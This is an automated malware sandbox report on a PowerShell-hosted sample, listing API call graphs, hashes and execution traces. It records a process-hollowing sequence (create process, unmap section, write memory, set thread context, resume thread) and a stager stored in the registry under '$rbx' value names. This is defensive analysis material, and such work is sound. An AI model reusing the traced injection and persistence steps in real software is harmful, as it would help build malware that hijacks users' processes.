                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                  • String ID: $rbx-svc32
                                  • API String ID: 4184240511-186198907
                                  • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                  • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                                  • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                  • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 194 401986-4019b1 lstrlenW call 40104b 197 4019b3-4019bd StrStrIW 194->197 198 4019dd-4019e0 194->198 197->198 199 4019bf 197->199 200 4019c0-4019da StrStrIW 199->200 200->200 201 4019dc 200->201 201->198
                                  APIs
                                  • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
                                  • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                                  • StrStrIW.SHLWAPI(?,Get-Delegate,754A2EB0), ref: 004019D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: Get-Delegate
                                  • API String ID: 1659193697-1365458365
                                  • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                  • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                                  • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                  • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 210 401798-40179e call 4017a5 ExitProcess
                                  APIs
                                    • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                    • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                    • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                    • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                    • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                    • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                  • ExitProcess.KERNEL32 ref: 0040179E
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                  • String ID:
                                  • API String ID: 3836967525-0
                                  • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                  • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                                  • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                  • Instruction Fuzzy Hash:

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 213 40118e-40119b GetModuleHandleA 214 4011aa-4011ac 213->214 215 40119d-4011a9 GetProcAddress 213->215
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000025.00000002.2163633416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_37_2_400000_powershell.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 1646373207-1489217083
                                  • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                  • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                                  • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                  • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

                                  Execution Graph

                                  Execution Coverage:11%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:7.7%
                                  Total number of Nodes:155
                                  Total number of Limit Nodes:4
                                  execution_graph 10239 7ffb4b10e8ac 10240 7ffb4b10e8b5 CreateFileA 10239->10240 10242 7ffb4b10ea4c 10240->10242 10062 7ffb4b110c5d 10063 7ffb4b110c6b NtWriteVirtualMemory 10062->10063 10065 7ffb4b110d37 10063->10065 10066 7ffb4b110f20 10067 7ffb4b110f2f NtSetContextThread 10066->10067 10069 7ffb4b110fba 10067->10069 10070 7ffb4b110221 10071 7ffb4b11022f CreateProcessA 10070->10071 10073 7ffb4b110950 10071->10073 10074 7ffb4b110fe4 10075 7ffb4b110fed NtResumeThread 10074->10075 10077 7ffb4b1110a4 10075->10077 10078 7ffb4b10ed66 10079 7ffb4b10ed75 MapViewOfFile 10078->10079 10081 7ffb4b10ee53 10079->10081 10082 7ffb4b10e7a8 10083 7ffb4b10e7b1 K32GetModuleInformation 10082->10083 10085 7ffb4b10e872 10083->10085 10086 7ffb4b10fde9 10087 7ffb4b10f6ba 10086->10087 10102 7ffb4b10fc3f 10086->10102 10087->10102 10109 7ffb4b10e0a8 10087->10109 10091 7ffb4b10f926 10120 7ffb4b10e0c8 10091->10120 10093 7ffb4b10f951 10093->10102 10127 7ffb4b10e0d8 10093->10127 10095 7ffb4b10f974 10095->10102 10134 7ffb4b10e0e8 10095->10134 10097 7ffb4b10fb95 10141 7ffb4b10e0f8 10097->10141 10099 7ffb4b10fbb7 10100 7ffb4b10e0d8 10 API calls 10099->10100 10099->10102 10101 7ffb4b10fbfc 10100->10101 10101->10102 10148 7ffb4b10e108 10101->10148 10104 7ffb4b10fc2b 10104->10102 10155 7ffb4b10e118 10104->10155 10106 7ffb4b10f99b 10106->10097 10106->10102 10107 7ffb4b10e0d8 10 API calls 10106->10107 10108 7ffb4b10e0e8 10 API calls 10106->10108 10107->10106 10108->10106 10110 7ffb4b10e0af NtUnmapViewOfSection 10109->10110 10112 7ffb4b10f8f4 10110->10112 10112->10102 10113 7ffb4b10e0b8 10112->10113 10114 7ffb4b10e0c1 10113->10114 10115 7ffb4b10e1ae 10114->10115 10162 7ffb4b10dd58 10114->10162 10118 7ffb4b10dd58 10 API calls 10119 7ffb4b10e1aa 10118->10119 10119->10091 10121 7ffb4b10e0d1 10120->10121 10122 7ffb4b10e1ae 10121->10122 10123 7ffb4b10dd58 10 API calls 10121->10123 10124 7ffb4b10e18c 10123->10124 10125 7ffb4b10dd58 10 API calls 10124->10125 10126 7ffb4b10e1aa 10125->10126 10126->10093 10128 7ffb4b10e0e1 10127->10128 10129 7ffb4b10e1ae 10128->10129 10130 7ffb4b10dd58 10 API calls 10128->10130 10131 7ffb4b10e18c 10130->10131 10132 7ffb4b10dd58 10 API calls 10131->10132 10133 7ffb4b10e1aa 10132->10133 10133->10095 10135 7ffb4b10e0f1 10134->10135 10136 7ffb4b10e1ae 10135->10136 10137 7ffb4b10dd58 10 API calls 10135->10137 10138 7ffb4b10e18c 10137->10138 10139 7ffb4b10dd58 10 API calls 10138->10139 10140 7ffb4b10e1aa 10139->10140 10140->10106 10143 7ffb4b10e101 10141->10143 10142 7ffb4b10e1ae 10143->10142 10144 7ffb4b10dd58 10 API calls 10143->10144 10145 7ffb4b10e18c 10144->10145 10146 7ffb4b10dd58 10 API calls 10145->10146 10147 7ffb4b10e1aa 10146->10147 10147->10099 10149 7ffb4b10e111 10148->10149 10150 7ffb4b10e1ae 10149->10150 10151 7ffb4b10dd58 10 API calls 10149->10151 10152 7ffb4b10e18c 10151->10152 10153 7ffb4b10dd58 10 API calls 10152->10153 10154 7ffb4b10e1aa 10153->10154 10154->10104 10156 7ffb4b10e121 10155->10156 10157 7ffb4b10e1ae 10156->10157 10158 7ffb4b10dd58 10 API calls 10156->10158 10159 7ffb4b10e18c 10158->10159 10160 7ffb4b10dd58 10 API calls 10159->10160 10161 7ffb4b10e1aa 10160->10161 10161->10102 10163 7ffb4b10e350 10162->10163 10189 7ffb4b10df28 10163->10189 10165 7ffb4b10e38a 10166 7ffb4b10e18c 10165->10166 10194 7ffb4b10df38 10165->10194 10166->10118 10168 7ffb4b10e39b 10199 7ffb4b10df48 10168->10199 10170 7ffb4b10e3b0 10171 7ffb4b10e582 10170->10171 10204 7ffb4b10df58 10170->10204 10234 7ffb4b10dfb8 10171->10234 10173 7ffb4b10e58a 10173->10166 10175 7ffb4b10e3f6 10175->10171 10209 7ffb4b10df68 10175->10209 10177 7ffb4b10e423 10178 7ffb4b10e57a 10177->10178 10214 7ffb4b10df78 10177->10214 10179 7ffb4b10dfa8 NtUnmapViewOfSection 10178->10179 10179->10171 10181 7ffb4b10e449 10183 7ffb4b10e512 10181->10183 10219 7ffb4b10df88 10181->10219 10229 7ffb4b10dfa8 10183->10229 10185 7ffb4b10e54e 10224 7ffb4b10df98 10185->10224 10187 7ffb4b10e55f 10187->10183 10188 7ffb4b10df88 NtUnmapViewOfSection 10187->10188 10188->10183 10191 7ffb4b10df31 10189->10191 10190 7ffb4b10e04b 10190->10165 10191->10190 10192 7ffb4b110ad0 NtUnmapViewOfSection 10191->10192 10193 7ffb4b110b0a 10192->10193 10193->10165 10195 7ffb4b10df41 10194->10195 10196 7ffb4b10e04b 10195->10196 10197 7ffb4b110ad0 NtUnmapViewOfSection 10195->10197 10196->10168 10198 7ffb4b110b0a 10197->10198 10198->10168 10201 7ffb4b10df51 10199->10201 10200 7ffb4b10e04b 10200->10170 10201->10200 10202 7ffb4b110ad0 NtUnmapViewOfSection 10201->10202 10203 7ffb4b110b0a 10202->10203 10203->10170 10206 7ffb4b10df5e 10204->10206 10205 7ffb4b10e04b 10205->10175 10206->10205 10207 7ffb4b110ad0 NtUnmapViewOfSection 10206->10207 10208 7ffb4b110b0a 10207->10208 10208->10175 10211 7ffb4b10df71 10209->10211 10210 7ffb4b10e04b 10210->10177 10211->10210 10212 7ffb4b110ad0 NtUnmapViewOfSection 10211->10212 10213 7ffb4b110b0a 10212->10213 10213->10177 10216 7ffb4b10df81 10214->10216 10215 7ffb4b10e04b 10215->10181 10216->10215 10217 7ffb4b110ad0 NtUnmapViewOfSection 10216->10217 10218 7ffb4b110b0a 10217->10218 10218->10181 10220 7ffb4b10df91 10219->10220 10221 7ffb4b10e04b 10220->10221 10222 7ffb4b110ad0 NtUnmapViewOfSection 10220->10222 10221->10185 10223 7ffb4b110b0a 10222->10223 10223->10185 10226 7ffb4b10dfa1 10224->10226 10225 7ffb4b10e04b 10225->10187 10226->10225 10227 7ffb4b110ad0 NtUnmapViewOfSection 10226->10227 10228 7ffb4b110b0a 10227->10228 10228->10187 10231 7ffb4b10dfb1 10229->10231 10230 7ffb4b10e04b 10230->10178 10231->10230 10232 7ffb4b110ad0 NtUnmapViewOfSection 10231->10232 10233 7ffb4b110b0a 10232->10233 10233->10178 10236 7ffb4b10dfc1 10234->10236 10235 7ffb4b10e04b 10235->10173 10236->10235 10237 7ffb4b110ad0 NtUnmapViewOfSection 10236->10237 10238 7ffb4b110b0a 10237->10238 10238->10173 10243 7ffb4b10eafa 10244 7ffb4b10eb09 CreateFileMappingW 10243->10244 10246 7ffb4b10ecb9 10244->10246

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1575 7ffb4b10df98-7ffb4b10e049 1590 7ffb4b10e04b-7ffb4b10e069 1575->1590 1591 7ffb4b10e0af-7ffb4b110b08 NtUnmapViewOfSection 1575->1591 1597 7ffb4b110b10-7ffb4b110b2c 1591->1597 1598 7ffb4b110b0a 1591->1598 1598->1597
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36a4d6dea3e41b39b305cc890728233a874e534075a421a5d4abf4d0287f81ba
                                  • Instruction ID: 3a1a54c1b467c65ebdc84bebb16ff6a929691b1f776a60f27eab9a9920df3459
                                  • Opcode Fuzzy Hash: 36a4d6dea3e41b39b305cc890728233a874e534075a421a5d4abf4d0287f81ba
                                  • Instruction Fuzzy Hash: 76510EB290D7844FDB02EB79D8966EA7FB0EF53214F0880FBC589C70A7D964580AC751

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1609 7ffb4b110c5d-7ffb4b110c69 1610 7ffb4b110c6b-7ffb4b110c73 1609->1610 1611 7ffb4b110c74-7ffb4b110ce8 1609->1611 1610->1611 1615 7ffb4b110cf2-7ffb4b110d35 NtWriteVirtualMemory 1611->1615 1616 7ffb4b110cea-7ffb4b110cef 1611->1616 1617 7ffb4b110d3d-7ffb4b110d5a 1615->1617 1618 7ffb4b110d37 1615->1618 1616->1615 1618->1617
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: b4c688de711f314f476c876e8f9385cfa1c4902ae01072d8004dacda5ee93b3c
                                  • Instruction ID: 77f54a8bec154739ae22c0edb67421c3ca7761512557293b6ca15570b9f67de8
                                  • Opcode Fuzzy Hash: b4c688de711f314f476c876e8f9385cfa1c4902ae01072d8004dacda5ee93b3c
                                  • Instruction Fuzzy Hash: 0231E47191CA5C8FDB18EF6CD8856F9BBE0FB5A325F04426ED049D3652CB70A806CB81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1628 7ffb4b10e078-7ffb4b10e07f 1629 7ffb4b10e081-7ffb4b10e096 1628->1629
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: f9e70d3d55e9377644899a6e0c70ee79f07cfb8dcb1e1f5da4705ebf2833dc05
                                  • Instruction ID: 87058237635a0dc9a68febd04b592bf6e908c282e6085edd35aa97843f7a2e25
                                  • Opcode Fuzzy Hash: f9e70d3d55e9377644899a6e0c70ee79f07cfb8dcb1e1f5da4705ebf2833dc05
                                  • Instruction Fuzzy Hash: 923148B2A0DA4C8FDB48DF68D84A7B97BF0FB55310F04416BD089C3266D6309846CB51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1631 7ffb4b10e0da-7ffb4b110ce8 1635 7ffb4b110cf2-7ffb4b110d35 NtWriteVirtualMemory 1631->1635 1636 7ffb4b110cea-7ffb4b110cef 1631->1636 1637 7ffb4b110d3d-7ffb4b110d5a 1635->1637 1638 7ffb4b110d37 1635->1638 1636->1635 1638->1637
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: MemoryVirtualWrite
                                  • String ID:
                                  • API String ID: 3527976591-0
                                  • Opcode ID: b7a1b62359e906909cf374aa5f92389ce228085ba21460595fa831a943e8bf9d
                                  • Instruction ID: 103b27a12af03dad71e58e74fa597f736a25ab47910dd4c54a4ca5314a8eff4a
                                  • Opcode Fuzzy Hash: b7a1b62359e906909cf374aa5f92389ce228085ba21460595fa831a943e8bf9d
                                  • Instruction Fuzzy Hash: C631A07191CA1C8FDB58EF6CD8496F9BBE1FB59321F00422ED44AD3652CB70A8068B85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1639 7ffb4b110a3e-7ffb4b110a4b 1640 7ffb4b110a4d-7ffb4b110a55 1639->1640 1641 7ffb4b110a56-7ffb4b110b08 NtUnmapViewOfSection 1639->1641 1640->1641 1645 7ffb4b110b10-7ffb4b110b2c 1641->1645 1646 7ffb4b110b0a 1641->1646 1646->1645
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: a8ec931e2f1574c3d2a04766a88bab7ec1013b27296961dcec73935a6aad3bfd
                                  • Instruction ID: cd138699853fb267878c03b5b73f69b2c708cc2022701cc06d0233e18bafd06f
                                  • Opcode Fuzzy Hash: a8ec931e2f1574c3d2a04766a88bab7ec1013b27296961dcec73935a6aad3bfd
                                  • Instruction Fuzzy Hash: 9B31F37090D6888FDB5ADF68D8467A97FE0EF56320F04429BD049C71A2D664A446CB92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1647 7ffb4b110fe4-7ffb4b110feb 1648 7ffb4b110fed-7ffb4b110ff5 1647->1648 1649 7ffb4b110ff6-7ffb4b1110a2 NtResumeThread 1647->1649 1648->1649 1653 7ffb4b1110a4 1649->1653 1654 7ffb4b1110aa-7ffb4b1110c6 1649->1654 1653->1654
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: e635766ef8a012280ac8ed4e3cb33c7a831842d17affe62388c79a4f3925e635
                                  • Instruction ID: 17fc84ad56ac0d9c12f887f683c7b808a28ef253cb964249780e6ae6ccac7bf7
                                  • Opcode Fuzzy Hash: e635766ef8a012280ac8ed4e3cb33c7a831842d17affe62388c79a4f3925e635
                                  • Instruction Fuzzy Hash: 4831F57190C64C8FDB58DFACD8457EABBE1EF5A310F04416BD409C3292CB709806CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: e55a4faf83a53ff7d4b5479bd4f8f14bc7b8176247e285c8647593223d8d9566
                                  • Instruction ID: 50ef359594f9e254826288dd8288a7d430b957ca642a8442ea116ae72f1c7d1b
                                  • Opcode Fuzzy Hash: e55a4faf83a53ff7d4b5479bd4f8f14bc7b8176247e285c8647593223d8d9566
                                  • Instruction Fuzzy Hash: 0921947190CA4C8FDB58EF6CD8867E97BF0EB5A321F04416BD449C3256C6749846CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 245191588c9b49d49fb907371125fd3202d47842401464699550c12f392e263e
                                  • Instruction ID: 70d8b002c5ec1437b566dabf75c8beeb45a84415e3fefc937ca52eecf1ab0386
                                  • Opcode Fuzzy Hash: 245191588c9b49d49fb907371125fd3202d47842401464699550c12f392e263e
                                  • Instruction Fuzzy Hash: E621BF70A08A0C8FDB58EF9CD849BFEBBE0EB59310F00416BD409D3256CB70A8568B91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
                                  • Instruction ID: 41eb028d870680c46deb67944c3a3705f0a076aa37f4def2bfe9a829ef886666
                                  • Opcode Fuzzy Hash: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
                                  • Instruction Fuzzy Hash: D8217470A0CA1C8FDB58EF9CD84ABF9B7E4EB69321F00416ED44ED3255D670A846CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
                                  • Instruction ID: 41eb028d870680c46deb67944c3a3705f0a076aa37f4def2bfe9a829ef886666
                                  • Opcode Fuzzy Hash: 5971238bc6e7c18256ecd7d0c6e387c147e9c1db6a99ffef1d8827f79af895fd
                                  • Instruction Fuzzy Hash: D8217470A0CA1C8FDB58EF9CD84ABF9B7E4EB69321F00416ED44ED3255D670A846CB91
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7dca77f34b96b607d1b9a2901e62dc6b00aed7903b1511b3ae6c88fb03033aa
                                  • Instruction ID: 11991f85777165b62e3111a5d447feefd45f3323813351fe9a525750d0a1a39a
                                  • Opcode Fuzzy Hash: b7dca77f34b96b607d1b9a2901e62dc6b00aed7903b1511b3ae6c88fb03033aa
                                  • Instruction Fuzzy Hash: 6E63B071A1CB458FEB68EF28C895A6577E1EBA9704F0545ADD44DC72A2CE30FC41CB82
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1706fa83c38e235844e4ddbb563edb40b7c247c384508c92150b4cb2f15ac41f
                                  • Instruction ID: 9951ac37447eab7a1c00b3169a34b4ff9741c69a8cd491e98d48980a977093cc
                                  • Opcode Fuzzy Hash: 1706fa83c38e235844e4ddbb563edb40b7c247c384508c92150b4cb2f15ac41f
                                  • Instruction Fuzzy Hash: C553A171A1CB448FEB68EF28D885A6577E1EBA9704F1545ADD44DC72A2CE30FC41CB82

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1483 7ffb4b110221-7ffb4b11022d 1484 7ffb4b11022f-7ffb4b110237 1483->1484 1485 7ffb4b110238-7ffb4b110249 1483->1485 1484->1485 1486 7ffb4b11024b-7ffb4b11028c 1485->1486 1487 7ffb4b11028d-7ffb4b1106f2 1485->1487 1486->1487 1496 7ffb4b110750-7ffb4b110782 1487->1496 1497 7ffb4b1106f4-7ffb4b110703 1487->1497 1504 7ffb4b1107e0-7ffb4b110831 1496->1504 1505 7ffb4b110784-7ffb4b110793 1496->1505 1497->1496 1498 7ffb4b110705-7ffb4b110708 1497->1498 1500 7ffb4b110742-7ffb4b11074a 1498->1500 1501 7ffb4b11070a-7ffb4b11071d 1498->1501 1500->1496 1502 7ffb4b11071f 1501->1502 1503 7ffb4b110721-7ffb4b110734 1501->1503 1502->1503 1503->1503 1506 7ffb4b110736-7ffb4b11073e 1503->1506 1511 7ffb4b11088f-7ffb4b1108c0 1504->1511 1512 7ffb4b110833-7ffb4b110842 1504->1512 1505->1504 1507 7ffb4b110795-7ffb4b110798 1505->1507 1506->1500 1509 7ffb4b1107d2-7ffb4b1107da 1507->1509 1510 7ffb4b11079a-7ffb4b1107ad 1507->1510 1509->1504 1513 7ffb4b1107af 1510->1513 1514 7ffb4b1107b1-7ffb4b1107c4 1510->1514 1522 7ffb4b1108ce-7ffb4b11094e CreateProcessA 1511->1522 1523 7ffb4b1108c2-7ffb4b1108ca 1511->1523 1512->1511 1515 7ffb4b110844-7ffb4b110847 1512->1515 1513->1514 1514->1514 1516 7ffb4b1107c6-7ffb4b1107ce 1514->1516 1517 7ffb4b110881-7ffb4b110889 1515->1517 1518 7ffb4b110849-7ffb4b11085c 1515->1518 1516->1509 1517->1511 1520 7ffb4b11085e 1518->1520 1521 7ffb4b110860-7ffb4b110873 1518->1521 1520->1521 1521->1521 1524 7ffb4b110875-7ffb4b11087d 1521->1524 1525 7ffb4b110950 1522->1525 1526 7ffb4b110956-7ffb4b110993 call 7ffb4b1109af 1522->1526 1523->1522 1524->1517 1525->1526 1529 7ffb4b110995 1526->1529 1530 7ffb4b11099a-7ffb4b1109ae 1526->1530 1529->1530
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 41101eecba729b9c238323a4c460504f4868d76c66b39cc4c2e87c4403716cc4
                                  • Instruction ID: 1ccba3abf6e325547c823c80f70e6fa7eb531e2c58115a2848c34428a4b487b8
                                  • Opcode Fuzzy Hash: 41101eecba729b9c238323a4c460504f4868d76c66b39cc4c2e87c4403716cc4
                                  • Instruction Fuzzy Hash: 08D1E47091CA894FDB65EF38D8497F97BE0FF59310F14826BD88DC7292DA34A4458B82

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1531 7ffb4b10eafa-7ffb4b10eb07 1532 7ffb4b10eb12-7ffb4b10ebdf 1531->1532 1533 7ffb4b10eb09-7ffb4b10eb11 1531->1533 1537 7ffb4b10ebe1-7ffb4b10ebf0 1532->1537 1538 7ffb4b10ec3a-7ffb4b10ecb7 CreateFileMappingW 1532->1538 1533->1532 1537->1538 1539 7ffb4b10ebf2-7ffb4b10ebf5 1537->1539 1545 7ffb4b10ecbf-7ffb4b10ecfb call 7ffb4b10ed17 1538->1545 1546 7ffb4b10ecb9 1538->1546 1540 7ffb4b10ec2f-7ffb4b10ec37 1539->1540 1541 7ffb4b10ebf7-7ffb4b10ec0a 1539->1541 1540->1538 1543 7ffb4b10ec0c 1541->1543 1544 7ffb4b10ec0e-7ffb4b10ec21 1541->1544 1543->1544 1544->1544 1547 7ffb4b10ec23-7ffb4b10ec2b 1544->1547 1551 7ffb4b10ecfd 1545->1551 1552 7ffb4b10ed02-7ffb4b10ed16 1545->1552 1546->1545 1547->1540 1551->1552
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateFileMapping
                                  • String ID:
                                  • API String ID: 524692379-0
                                  • Opcode ID: 447607177f0f1c0622216c216d27aa15d68124854708de61b267b0a62f65a328
                                  • Instruction ID: d797d0122c95c4b0fc8e63740ccffda890ba16c922eb21cb5afc705ea5fa82cc
